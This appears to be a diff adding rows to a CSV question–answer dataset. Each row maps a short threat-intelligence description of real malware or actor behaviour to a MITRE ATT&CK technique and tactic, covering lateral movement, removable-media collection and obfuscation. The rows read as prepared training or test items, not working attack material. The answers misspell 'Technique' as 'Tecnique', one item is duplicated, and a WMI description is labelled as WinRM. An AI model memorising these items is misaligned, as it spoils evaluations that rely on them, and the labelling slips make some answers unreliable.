+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lateral movement can be done with Net through net use commands to connect to the on remote systems.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Net Crawler uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya can use PsExec, which interacts with the ADMIN$ network share to execute commands on remote systems.","Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Olympic Destroyer uses PsExec to interact with the ADMIN$ network share to execute commands on remote systems.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PsExec, a tool that has been used by adversaries, writes programs to the ADMIN$ network share to execute commands on remote systems.","Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Regin malware platform can use Windows admin shares to move laterally.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Royal can use SMB to connect to move laterally.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has used the C$ network share for lateral movement.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon accesses network share(s), enables share access to the target device, copies an executable payload to the target system, and uses a Scheduled Task/Job to execute the malware.","Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet propagates to available network shares.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zox has the ability to use SMB for communication.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell has been copied over network shares to move laterally.,"Tecnique: T1021.002 Remote Services: SMB/Windows Admin Shares, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can deliver Beacon payloads for lateral movement by leveraging remote COM execution.,"Tecnique: T1021.003 Remote Services: Distributed Component Object Model, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can utilize Invoke-DCOM to leverage remote COM execution for lateral movement.,"Tecnique: T1021.003 Remote Services: Distributed Component Object Model, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can use `System` namespace methods to execute lateral movement using DCOM.,"Tecnique: T1021.003 Remote Services: Distributed Component Object Model, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution.","Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used SSH for lateral movement.","Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 used secure shell (SSH) to move laterally among their targets.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used SSH for lateral movement in compromised environments including for enabling access to ESXi host servers.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackTech has used Putty for remote access.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has remotely accessed compromised environments via secure shell (SSH) for lateral movement.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used SSH to move laterally through victim environments.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used the PuTTY and Plink tools for lateral movement.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GCMAN uses Putty for lateral movement.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group used SSH and the PuTTy PSCP utility to gain access to a restricted segment of a compromised network.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan used ssh for internal reconnaissance.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used Putty to access compromised systems.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has spread its coinminer via SSH.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used SSH to connect back to victim machines. TeamTNT has also used SSH to transfer tools and payloads onto victim hosts and execute them.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used Putty Secure Copy Client (PSCP) to transfer data.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can SSH to a remote service.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire contains modules for executing commands over SSH as well as in-memory VNC agent injection.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kinsing has used SSH for lateral movement.,"Tecnique: T1021.004 Remote Services: SSH, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used TightVNC to control compromised hosts.,"Tecnique: T1021.005 Remote Services: VNC, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has installed TightVNC server and client on compromised servers and endpoints for lateral movement.,"Tecnique: T1021.005 Remote Services: VNC, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GCMAN uses VNC for lateral movement.,"Tecnique: T1021.005 Remote Services: VNC, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used VNC tools, including UltraVNC, to remotely interact with compromised hosts.","Tecnique: T1021.005 Remote Services: VNC, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp can start a remote VNC session by downloading a new plugin.,"Tecnique: T1021.005 Remote Services: VNC, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DanBot can use VNC for remote access to targeted systems.,"Tecnique: T1021.005 Remote Services: VNC, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton uses VNC to connect into systems.,"Tecnique: T1021.005 Remote Services: VNC, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has used a VNC module to monitor the victim and collect information to pivot to valuable systems on the network,"Tecnique: T1021.005 Remote Services: VNC, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT has the ability of performing remote desktop access via a VNC console.,"Tecnique: T1021.005 Remote Services: VNC, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell supports functionality for VNC sessions.,"Tecnique: T1021.005 Remote Services: VNC, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used WinRM via PowerShell to execute commands and payloads on remote hosts.","Tecnique: T1021.006 Remote Services: Windows Remote Management, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used WinRM for lateral movement.,"Tecnique: T1021.006 Remote Services: Windows Remote Management, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has leveraged `WMI` to move laterally within a compromised network via application servers and SQL servers.,"Tecnique: T1021.006 Remote Services: Windows Remote Management, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used WinRM to enable remote execution.,"Tecnique: T1021.006 Remote Services: Windows Remote Management, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used Window Remote Management to move laterally through a victim network.,"Tecnique: T1021.006 Remote Services: Windows Remote Management, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can use WinRM for pivoting.,"Tecnique: T1021.006 Remote Services: Windows Remote Management, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use WinRM to execute a payload on a remote host.,"Tecnique: T1021.006 Remote Services: Windows Remote Management, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY tracks `TrustedHosts` and can move laterally to these targets via WinRM.,"Tecnique: T1021.006 Remote Services: Windows Remote Management, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used compromised Azure credentials for credential theft activity and lateral movement to on-premises systems.","Tecnique: T1021.007 Remote Services: Cloud Services, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has leveraged compromised high-privileged on-premises accounts synced to Office 365 to move laterally into a cloud environment, including through the use of Azure AD PowerShell.","Tecnique: T1021.007 Remote Services: Cloud Services, Tactic: TA0008 Lateral Movement"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider used compromised Azure credentials for credential theft activity and lateral movement to on-premises systems.
+
+Scattered Spider has also leveraged pre-existing AWS EC2 instances for lateral movement and data collection purposes.","Tecnique: T1021.007 Remote Services: Cloud Services, Tactic: TA0008 Lateral Movement"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT28 backdoor may collect the entire contents of an inserted USB device.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Gamaredon Group file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives.","Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla RPC backdoors can collect files from USB thumb drives.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can find and collect data from removable media devices.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to collect data from USB devices.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADNEWS copies files with certain extensions from USB devices to
+a predefined directory.","Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke steals user files from removable media with file extensions and keywords that match a predefined list.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson contains a module to collect data from removable drives.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch can monitor removable drives and exfiltrate files matching a given extension list.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive can scan all .exe files located in the USB drive.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by SPACESHIP.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The FunnyDream FilePakMonitor component has the ability to collect files from removable devices.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT steals files based on an extension list if a USB drive is connected to the system.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can collect jpeg files from connected MTP devices.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete can find, encrypt, and upload files from fixed and removable drives.","Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT has the ability to extract data from removable devices connected to the endpoint.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prikormka contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can collect data from removable media and stage it for exfiltration.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remsec has a package that collects documents from any inserted USB sticks.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rover searches for files on attached removable drives based on a predefined list of file extensions every five seconds.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to steal written CD images and files of interest from previously connected removable drives when they become available again.,"Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Once a removable media device is inserted back into the first victim, USBStealer collects data from it that was exfiltrated from a second victim.","Tecnique: T1025 Data from Removable Media, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used heavily obfuscated code with Industroyer in its Windows Notepad backdoor.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors used Base64-encoded strings.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT-C-36 has used ConfuserEx to obfuscate its variant of Imminent Monitor, compressed payload and RAT packages, and password protected encrypted email attachments to avoid detection.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 obfuscates files or information to help evade defensive measures.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 obfuscates strings and payloads.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used VMProtected binaries in multiple intrusions.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BackdoorDiplomacy has obfuscated tools and malware it uses with VMProtect.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackOasis's first stage shellcode contains a NOP sled with alternative instructions that was likely designed to bypass antivirus tools.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca used Base64 to encode strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has obfuscated malware to help avoid detection.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used a modified version of HTRAN in which they obfuscated strings such as debug messages in an apparent attempt to evade detection.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gallmaker obfuscated shellcode used during execution.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has delivered self-extracting 7z archive files within malicious document attachments.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used Base64-encoded shellcode strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has obfuscated binary strings including the use of XOR encryption and Base64 encoding. Kimsuky has also modified the first byte of DLL implants targeting victims to prevent recognition of the executable file format.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has delivered initial payloads hidden using archives and encoding measures.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has modified UPX headers after packing files to break unpackers.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used Base64 encoding within malware variants.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used string encoding with floating point calculations.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Most of the strings in ADVSTORESHELL are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Action RAT's commands, strings, and domains can be Base64 encoded within the payload.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla has had its code obfuscated in an apparent attempt to make analysis difficult. Agent Tesla has used the Rijndael symmetric encryption algorithm to encrypt strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has obfuscated strings such as antivirus vendor names, domains, files, and others.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor has obfuscated code with stack strings and string encryption.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has XOR-encrypted collected system information prior to sending to a C2. AppleJeus has also used the open source ADVObfuscation library for its components.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has the ability to Base64 encode its payload and custom encrypt API calls.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avaddon has used encrypted strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has used XOR-encoded strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BUSHWALK can encrypt the resulting data generated from C2 commands with RC4.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can encrypt data using AES prior to exfiltration.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon used the ""StackStrings"" obfuscation technique to hide malicious functionalities.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has used encrypted payload files and maintains an encrypted configuration structure in memory.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee has been delivered as password-protected zipped ISO files and used control-flow-flattening to obfuscate the flow of functions.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore has obfuscated data with base64, AES, RC4, and bz2.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CARROTBALL has used a custom base64 alphabet to decode files.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER can store obfuscated configuration information in the last 56 bytes of the file `/date/.bd.key/preload.so`.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CORESHELL obfuscates strings using a custom stream cipher.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak encrypts strings to make analysis more difficult.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Clambling executable has been obfuscated when dropped on a compromised host.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CoinTicker initially downloads a hidden encoded file.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ComRAT has encrypted its virtual file system using AES-256 in XTS mode.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie uses RC4 and Base64 to obfuscate strings.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker has obfuscated its code to prevent its removal from host machines.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conti can use compiler-based obfuscation for its code, encrypt DLLs, and hide Windows API calls.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DRATzarus can be partly encrypted with XOR.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate uses a hard-coded string as a seed, along with the victim machine hardware identifier and input text, to generate a unique string used as an internal mutex value to evade static detection based on mutexes.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla has been obfuscated with the DeepSea .NET and ConfuserEx code obfuscators.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis obfuscates its code and encrypts the API names.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Diavol has Base64 encoded the RSA public key used for encrypting files.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can generate encrypted, compressed/encoded, or otherwise obfuscated code modules.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dridex's strings are obfuscated using RC4.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Drovorub has used XOR encrypted payloads in WebSocket client to server messages.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The DustySky dropper uses a function to obfuscate the name of functions and other parts of the malware.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ECCENTRICBANDWAGON has encrypted strings with RC4.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EKANS uses encoded strings in its process kill list.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has obfuscated its strings with a simple XOR encryption with a static key.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ecipekac can use XOR, AES, and DES to encrypt loader shellcode.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Epic heavily obfuscates its code to make analysis more difficult.,"Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke can use base64 encoding, string stacking, and opaque predicates for obfuscation.","Tecnique: T1027 Obfuscated Files or Information, Tactic: TA0005 Defense Evasion"
